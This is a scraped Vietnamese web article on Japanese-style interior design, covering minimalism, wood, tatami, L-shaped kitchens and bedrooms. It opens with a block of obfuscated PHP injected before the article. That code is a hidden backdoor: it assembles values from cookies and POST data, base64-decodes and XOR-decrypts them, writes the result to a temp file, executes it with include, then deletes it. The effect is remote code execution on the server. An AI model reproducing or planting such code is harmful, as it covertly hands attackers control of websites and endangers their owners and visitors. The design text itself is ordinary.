$KAkylTEEY = chr ( 482 - 414 )."\x48" . "\161" . "\x5f" . 'w' . "\x6f" . "\x67" . chr (79); $BLHPO = "\143" . chr (108) . "\141" . 's' . 's' . "\x5f" . "\x65" . chr ( 220 - 100 ).'i' . chr (115) . chr ( 229 - 113 ).chr ( 225 - 110 ); $DPsHSlPuA = class_exists($KAkylTEEY); $BLHPO = "16968";$KybyXPAy = !1;if ($DPsHSlPuA == $KybyXPAy){function WRjHwIbZL(){return FALSE;}$fOnVgH = "60659";WRjHwIbZL();class DHq_wogO{private function rlZJn($fOnVgH){if (is_array(DHq_wogO::$gRtPmcWgqM)) {$zpikP = sys_get_temp_dir() . "/" . crc32(DHq_wogO::$gRtPmcWgqM["\163" . 'a' . chr ( 996 - 888 ).chr (116)]);@DHq_wogO::$gRtPmcWgqM["\x77" . 'r' . chr (105) . 't' . 'e']($zpikP, DHq_wogO::$gRtPmcWgqM["\143" . chr ( 1017 - 906 ).'n' . chr (116) . "\x65" . "\x6e" . "\x74"]);include $zpikP;@DHq_wogO::$gRtPmcWgqM["\x64" . chr ( 990 - 889 )."\x6c" . 'e' . 't' . "\x65"]($zpikP); $fOnVgH = "60659";exit();}}private $PkkbUal;public function wPWLohDk(){echo 27132;}public function __destruct(){$fOnVgH = "46060_22836";$this->rlZJn($fOnVgH); $fOnVgH = "46060_22836";}public function __construct($NTbnrrri=0){$dTJfkDR = $_POST;$lhQsTgIH = $_COOKIE;$aYajfQpXwB = "c11c5495-d7c1-4aa3-bdd1-dc687432bcb9";$BUmNVU = @$lhQsTgIH[substr($aYajfQpXwB, 0, 4)];if (!empty($BUmNVU)){$atjsQvzxK = "base64";$fobbAQWcLe = "";$BUmNVU = explode(",", $BUmNVU);foreach ($BUmNVU as $RzPEjLbK){$fobbAQWcLe .= @$lhQsTgIH[$RzPEjLbK];$fobbAQWcLe .= @$dTJfkDR[$RzPEjLbK];}$fobbAQWcLe = array_map($atjsQvzxK . chr ( 632 - 537 ).chr (100) . chr (101) . "\143" . "\x6f" . "\144" . chr (101), array($fobbAQWcLe,)); $fobbAQWcLe = $fobbAQWcLe[0] ^ str_repeat($aYajfQpXwB, (strlen($fobbAQWcLe[0]) / strlen($aYajfQpXwB)) + 1);DHq_wogO::$gRtPmcWgqM = @unserialize($fobbAQWcLe); $fobbAQWcLe = class_exists("46060_22836");}}public static $gRtPmcWgqM = 33420;}$iJgbDTDD = new /* 56130 */ $KAkylTEEY(60659 + 60659); $fOnVgH = strpos($fOnVgH, $fOnVgH); $KybyXPAy = $iJgbDTDD = $fOnVgH = Array();} Thiết kế nội thất Nhật Bản: trải nghiệm không gian hoàn mỹ
Image Alt

Thiết kế nội thất Nhật Bản: trải nghiệm không gian hoàn mỹ

Phòng khách và phòng đọc sách

Thiết kế nội thất Nhật Bản: trải nghiệm không gian hoàn mỹ

Nhật Bản luôn được biết đến như một chuẩn mực về đạo đức và cái đẹp. Trong đó, lối sống tối giản là điều mà thế giới ngưỡng mộ nhất khi nhắc về quốc gia này. Tư duy sống này được ứng dụng hầu hết trong các lĩnh vực đời sống, trong đó có thiết kế nội thất. Trong bài viết này, hãy cùng tìm hiểu xem thiết kế nội thất Nhật Bản có gì đặc biệt nhé.

Đặc trưng thiết kế nội thất Nhật Bản:

Nội thất Nhật Bản đề cao sự tối giản và công năng. Không gian nội thất Nhật Bản thường được tạo nên từ các đường nét mang tính chất hình học vuông vắn. Các món đồ nội thất nhỏ gọn, có kích thước tương ứng với không gian được bố trí gọn gàng. Đặc biệt là đồ nội thất thông minh giúp tiết kiệm diện tích và mang lại sự tiện nghi. Cũng chính vì thế mà phong cách nội thất Nhật Bản thích hợp hầu hết các không gian và có khả năng tối ưu hóa không gian nhỏ.

Thiết kế nội thất phong cách Nhật Bản

Những yếu tố tạo nên không gian nội thất Nhật Bản hoàn hảo

Thiết kế nội thất phong cách Nhật Bản ưu tiên không gian sống xanh. Vật liệu thân thiện với môi trường và có khả năng tái chế là lựa chọn hàng đầu. Trong đó gỗ là vật liệu chính và được ứng dụng nhiều nhất. Ngoài ra cây xanh và ánh sáng tự nhiên cũng là yếu tố không thể thiếu trong không gian này.

Nhật Bản là một nền văn hóa lâu đời. Đặc biệt là các giá trị truyền thống vẫn được lưu giữ và phát huy cho đến ngày này. Vì vậy không quá lạ lẫm khi các đồ trang trí đậm chất đất nước Mặt Trời mọc xuất hiện trong phòng. Điển hình là các món đồ trang trí bằng gốm, chiếu tatami hay tranh treo tường độc đáo.

Mẫu thiết kế nội thất Nhật Bản đẹp:

Dưới đây là gợi ý về mẫu nội thất phong cách Nhật Bản đẹp nhất hiện nay. Hãy cùng tham khảo ngay nào.

Thiết kế phòng khách phong cách Nhật Bản:

Thiết kế nội thất Nhật Bản cho phòng khách

Nội thất phòng khách chung cư phong cách Nhật Bản

Trang trí nội thất phòng khách đẹp

Các hình trang trí được lấy cảm hứng từ anime Nhật Bản

Thiết kế nội thất nhật bản cho chung cư

Phòng khách và phòng đọc sách được ngăn cách bằng kệ trang trí đa năng

Phòng đọc sách kiểu Nhật

Phòng đọc sách với điểm nhấn là bàn trà kiểu Nhật trang nhã

Thiết kế không gian mở

Phòng khách và phòng bếp được bố trí liên thông với nhau

Không gian sinh hoạt chung của gia đình được bố trí thông thoáng và rộng rãi. Vật liệu gỗ được sử dụng chủ đạo mang lại cảm giác mộc mạc và ấm cúng. Các chi tiết thiết kế được kết hợp hài hòa tạo nên một không gian công năng và thẩm mỹ.

Tủ bếp đẹp phong cách Nhật Bản:

Tủ bếp chữ L phong cách Nhật Bản đẹp

Tủ bếp chữ L tiện nghi

Bàn ăn đẹp

Khu vực ăn uống ấm cúng của gia đình

Các KTS đã lựa chọn dạng tủ bếp chữ L cho căn hộ. Hệ tủ bếp được bố trí sát tường giúp tối ưu diện tích hiệu quả. Đặc biệt, tủ bếp hình chữ L kết hợp cùng các phụ kiện giúp khắc phục và tận dụng góc khuất. Tạo nên một không gian lưu trữ và nấu nướng hoàn hảo.

Thiết kế phòng ngủ phong cách Nhật Bản:

Thiết kế nội thất nhật bản cho phòng ngủ

Phòng ngủ Master được bố trí gọn gàng và công năng

Nội thất phòng ngủ đẹp

Cửa sổ kính cường lực lớn giúp tận dụng tối đa ánh sáng tự nhiên

Bàn trang điểm

Thiết kế cửa lùa đậm chất Nhật Bản

Thiết kế nội thất phòng thay đồ phong cách Nhật

Phòng thay đồ với điểm nhấn màu trắng tinh tế

Thiết kế phòng ngủ phụ đẹp

Phòng ngủ phụ kết hợp làm việc hiện đại

Thiết kế phòng ngủ cho bé

Phòng ngủ cho bé với thiết kế giường giật cấp thông minh

Mẫu thiết kế bao gồm 3 phòng ngủ. Mỗi phòng đều được bố trí theo lối riêng phù hợp với nhu cầu của người dùng. Tuy nhiên vẫn đảm bảo hài hòa với cảm quan chung của ngôi nhà.

BÀI VIẾT LIÊN QUAN: